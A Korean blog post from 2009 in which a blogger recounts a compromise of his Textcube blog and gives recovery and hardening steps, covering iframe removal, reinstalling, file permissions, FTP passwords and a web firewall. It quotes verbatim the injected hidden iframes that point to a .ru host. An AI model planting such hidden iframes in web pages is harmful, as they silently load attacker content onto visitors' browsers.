텍스트큐브 해킹 당하다..막는 방법

2009 09 28
글을 수정합니다.

FTP 비밀번호를 변경하니 해킹 툴로 뚫는데 시간이 많이 걸리나보네여..
파일 변경이 안되고 있습니다.

비밀번호는 6자리 이하면 뚫리기 쉽다고합니다.
8자리 이상이 안전한데
저는 기존에 8자리였는데

이번에 숫자, 영문 , 특수문자 조합으로 11자리로 바꾸어났습니다.

비번 안 바꾸어서 여전히 해킹당한 모습

비번을 바꾸어서 해킹에 다소 시간이 걸리는 모습

2009 09 28

글을 수정합니다.

아래 방법으로 해도 막을 수가 없네요...   FTP 비밀번호를 먼저 변경하고
일단

해킹당한 블로그를 복원해야겠죠???

복원은 간단합니다.

검색을 해보니
index.php , index.gif.php   이 파일들만 변경이 됩니다
혹시 블로그에 다른 홈페이지 링크가 걸려있다면 그것들도 따라가서 해킹을 해버립니다

텍스트큐브의   index.html 파일은 변경이 안되는데 다른 곳의 즉, 무료계정의 index.html은 변경이되더군요

참고하시구요

백업파일을 만들어 놓는게 제일 좋겠죠...

일단 복원부터 해야하니...

index.php 제일 하단에 삽입된 아이프레임 소스를 삭제하고 다시 올립니다

그런 후에..

textcube.org 로 가셔서 설치소스 다시 다운받아서 덮어쓰기 하시면됩니다
물론
사전에

skin 디렉토리는 백업을 받아두세요, plugin 에서 별도로 다운받아서 설치한게 있다면
그 파일들도 백업 후에 플러그인의 index.php 소스의 하단의 아이프레임을 삭제하시면 됩니다

파란색으로 선택한 부분들을 덮어쓰기하면됩니다. 물론 루트의 index.php 의 하단의 아이프레임 삭제하시구요skin 디렉토리의 스킨은 사전 백업

스킨의 최신 상태는 customize 입니다. 스킨을 편집했다면...

결론적으로 해킹당했다고 당황하지 마시고 루트 디렉토리의 index.php 파일만 원본으로 수정하시고
나머지는 텍스트큐브.org 에서 원본 소스 다운로드 받아서 덮어쓰기 하시면
정상으로 복구됩니다.






2009 09 21

글 수정합니다.
이 방식으로하니 또 해킹 당하네요.

해킹 당하기 전에 백업을 해두는게 가장 좋습니다.

 XSS 해킹을 당하면 저기 index.php  와 플러그인의 각 index.php
소스 제일 하단에 아이프레임소스가 삽입이 됩니다.
그러니 복구는 상당히 쉬운 편입니다.

즉, 플러그인 폴더의 파일을 다 삭제하고 다시 올리면됩니다.
루트의 index.php 제일 하단의 아이프레임 코드만 삭제하시면 됩니다.

그리고 나서.

호스팅 업체에 웹방화벽에 XSS 해킹 불가능하게 설정해달라고 요청합니다.





텍스트큐브...
트큐브 1.7.8 : Con moto (r18)

이 버전을 사용 중인데..
오늘 해킹 당했습니다.  XSS 라는 해킹 방법으로 해킹을 당했는데..
호스팅 업체에서 웹방화벽 허접한.... 공개된 무료 소프트웨어 방식을 사용해서
해킹을 당했습니다.

참고로 저는 웹방화벽 엔지니어 입니다.

공개되어 있다보니... 뚫었나 봅니다

도메인

http://domaim.com
상에 텍스트큐브를 설치하고

퍼미션을 777, 707 로 준 곳은 100%로 해킹 당합니다.

해킹 당하면 먼저 indexphp 페이지에 아이프레임으로 경로가 설정되는데.

이건...
삭제해도 자기복제로 각 글 마다 남게되어 있습니다.

블로그를 백업하고 삭제하고 다시 설치하고

퍼미션을

이런 식으로 공동권한에 읽기만 주시기 바랍니다.
설치할때는 777로 주고 나중에 변경하세요,

데이터를 백업을 먼저하세요

http://도메인.com/owner/data

이 주소로 이동 후에 데이터를 먼저 백업합니다.  어떻한 관리자 페이지로 경로를 타고 이동하면
하얗게 보입니다
위의 주소로 바로 이동하세요,




<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div><div style="display:none"></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>

해킹 당하면 위코드가 각 페이지에 삽입이되어 하얗게 보입니다.


참고하시구요.

웹방화벽(하드웨어방식,  모니터랩 웹방화벽 추천) 이 설치되어 있지 않은 상태에서..
퍼미션이 777, 707 인 텍스트큐브는 100%로 해킹 당합니다.

그러나 루트 밑에 폴더를 만들고 블로그 설치한 곳은 그 나마 안전합니다.

http://domain.com/blog
이런 주소는 그나마 안전하죠